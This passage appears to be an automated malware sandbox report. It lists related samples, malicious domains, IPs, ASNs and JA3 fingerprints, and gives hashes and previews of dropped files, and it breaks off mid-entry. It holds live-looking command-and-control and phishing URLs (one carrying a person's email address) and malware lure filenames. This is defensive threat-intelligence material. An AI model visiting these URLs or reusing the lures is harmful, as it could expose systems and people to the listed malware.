                                                                                                aQdB62N7SB.elfGet hashmaliciousShikitega, XmrigBrowse
                                                                                                • main.dsn.ovh/dns/lovely
                                                                                                QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                • filetransfer.io/data-package/DyuQ5y15/download
                                                                                                zygWTMeQC2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                • 138231cm.n9shteam.in/CpuApiprotectTemp.php
                                                                                                PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.cc101.pro/ttiz/
                                                                                                Aunali_khokhawala-In Services.Agreement-SDYAMPA 416944.rtfGet hashmaliciousEvilProxy, Fake Captcha, HTMLPhisherBrowse
                                                                                                • vh26kx.pinboarddisplaced.com/?email=

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                paste.ee20042024150836 14.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 188.114.96.3
                                                                                                Swift Payment 20241014839374.vbsGet hashmaliciousRemcosBrowse
                                                                                                • 188.114.96.3
                                                                                                segura.vbsGet hashmaliciousAsyncRATBrowse
                                                                                                • 188.114.96.3
                                                                                                DHL_Shipping_Invoices_Awb_0000000.vbsGet hashmaliciousRemcosBrowse
                                                                                                • 188.114.97.3
                                                                                                20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 188.114.97.3
                                                                                                awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                • 188.114.97.3
                                                                                                DIEN OMM 10.10.2024.vbeGet hashmaliciousUnknownBrowse
                                                                                                • 188.114.97.3
                                                                                                10092024150836 09.10.2024.vbeGet hashmaliciousFormBookBrowse
                                                                                                • 188.114.96.3
                                                                                                Logistics1.vbsGet hashmaliciousFormBookBrowse
                                                                                                • 188.114.96.3
                                                                                                SWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                • 188.114.97.3
                                                                                                geoplugin.netDHL AWB_NO_92847309329.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                                                • 178.237.33.50
                                                                                                Order_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                Salary Revision_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                Scanned_22C-6e24090516030.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                Order.vbsGet hashmaliciousRemcosBrowse
                                                                                                • 178.237.33.50
                                                                                                rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                • 178.237.33.50
                                                                                                172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                • 178.237.33.50

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                CLOUDFLARENETUSla.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                • 104.29.220.112
                                                                                                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                • 104.29.0.194
                                                                                                ceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                                                                • 172.71.167.138
                                                                                                https://doc.tayato.com/mo6/?top=uwe.geiersbach@bbraun.comGet hashmaliciousUnknownBrowse
                                                                                                • 104.21.37.177
                                                                                                https://mcprod.britwyn.co.nzGet hashmaliciousUnknownBrowse
                                                                                                • 104.17.247.203
                                                                                                Salary_Increase_Approval_Open_Enrollment_202417918.pdfGet hashmaliciousUnknownBrowse
                                                                                                • 104.17.25.14
                                                                                                http://manatoki463.netGet hashmaliciousUnknownBrowse
                                                                                                • 141.101.120.10
                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                • 172.67.206.204
                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                • 104.21.53.8
                                                                                                https://na2.docusign.net/Signing/EmailStart.aspx?a=52f7eab1-67dd-4b2c-9342-8cf1837ca85b&etti=24&acct=8327544d-e5d8-4fb1-8036-f62a8723beb9&er=1f6c0370-0bf0-4639-942a-0c529236b3c5Get hashmaliciousHtmlDropperBrowse
                                                                                                • 188.114.97.3
                                                                                                SOFTLAYERUSbin.armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                • 169.47.245.36
                                                                                                LNLAncf2v5.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                • 161.159.147.94
                                                                                                la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                • 158.175.138.255
                                                                                                yakuza.sh.elfGet hashmaliciousUnknownBrowse
                                                                                                • 161.159.201.98
                                                                                                arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                • 174.37.138.251
                                                                                                la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                • 172.94.213.128
                                                                                                la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                • 108.168.171.164
                                                                                                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                • 67.19.213.165
                                                                                                mips.elfGet hashmaliciousUnknownBrowse
                                                                                                • 169.38.239.94
                                                                                                la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                • 149.81.172.98
                                                                                                CLOUDFLARENETUSla.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                • 104.29.220.112
                                                                                                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                • 104.29.0.194
                                                                                                ceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                                                                • 172.71.167.138
                                                                                                https://doc.tayato.com/mo6/?top=uwe.geiersbach@bbraun.comGet hashmaliciousUnknownBrowse
                                                                                                • 104.21.37.177
                                                                                                https://mcprod.britwyn.co.nzGet hashmaliciousUnknownBrowse
                                                                                                • 104.17.247.203
                                                                                                Salary_Increase_Approval_Open_Enrollment_202417918.pdfGet hashmaliciousUnknownBrowse
                                                                                                • 104.17.25.14
                                                                                                http://manatoki463.netGet hashmaliciousUnknownBrowse
                                                                                                • 141.101.120.10
                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                • 172.67.206.204
                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                • 104.21.53.8
                                                                                                https://na2.docusign.net/Signing/EmailStart.aspx?a=52f7eab1-67dd-4b2c-9342-8cf1837ca85b&etti=24&acct=8327544d-e5d8-4fb1-8036-f62a8723beb9&er=1f6c0370-0bf0-4639-942a-0c529236b3c5Get hashmaliciousHtmlDropperBrowse
                                                                                                • 188.114.97.3
                                                                                                ATOM86-ASATOM86NLceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                                                                • 85.222.236.220
                                                                                                DHL AWB_NO_92847309329.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                                                • 178.237.33.50
                                                                                                Order_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                Salary Revision_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                Scanned_22C-6e24090516030.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                Order.vbsGet hashmaliciousRemcosBrowse
                                                                                                • 178.237.33.50
                                                                                                rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                • 178.237.33.50
                                                                                                duEsmKBlGr.exeGet hashmaliciousUnknownBrowse
                                                                                                • 178.237.33.50
                                                                                                lA0Z0vjXfA.exeGet hashmaliciousUnknownBrowse
                                                                                                • 178.237.33.50

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                3b5074b1b5d032e5620f69f9f700ff0ehttps://doc.tayato.com/mo6/?top=uwe.geiersbach@bbraun.comGet hashmaliciousUnknownBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                http://linternasdelmar.com/RDGHEVGet hashmaliciousUnknownBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                MDE_File_Sample_c30bdf9dd71e806fd1e0e834647bce524afa781f.zipGet hashmaliciousUnknownBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                (No subject) (90).emlGet hashmaliciousUnknownBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                DHL.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                DHL_Shipping_Invoices_Awb_BL_000000000102120242247820020031808174Global180030010212024.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                Order_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                Salary Revision_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                Scanned_22C-6e24090516030.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                                                                Download File
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):957
                                                                                                Entropy (8bit):5.009232287567204
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:qsdRNuKyGX85jHf3SvXhNlT3/7YvfbYro:xPN0GX85mvhjTkvfEro
                                                                                                MD5:759439A00540A5351C6ED1D4E86C08CC
                                                                                                SHA1:B3C8DC85717DA6D27CF8A3F2533216BD9DA8DD0F
                                                                                                SHA-256:457CC36B09721B31358CCB09F7822FBBF3CB120FA03349642814CB0A9B107126
                                                                                                SHA-512:90F41E51A1BA10CE2D3DF77A34FF108BADA8AD3B983689726FC9911796CE735A5650233BD32F0CB2C86B894908E313405FD8DDA00E64C7127958CE9C164EC3A8
                                                                                                Malicious:false
                                                                                                Preview:{. "geoplugin_request":"173.254.250.76",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):9434
                                                                                                Entropy (8bit):4.928515784730612
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                Malicious:false
                                                                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                Malicious:false
                                                                                                Preview:@...e...........................................................

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00pvq4sc.t3i.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12lqsw0q.pmk.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3el32ich.rk5.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3uvupvh0.4sq.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4m5g3u03.2yg.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ayycdulq.lif.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bcg1l3yk.e0b.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blmkc2b4.ozs.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxskrxof.p14.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dtxye3lw.u4t.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eein2ezk.r4t.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ei3rpfot.1yp.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmrxwny3.fc5.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_icg0nb2w.igy.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iewb3vnf.q2j.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
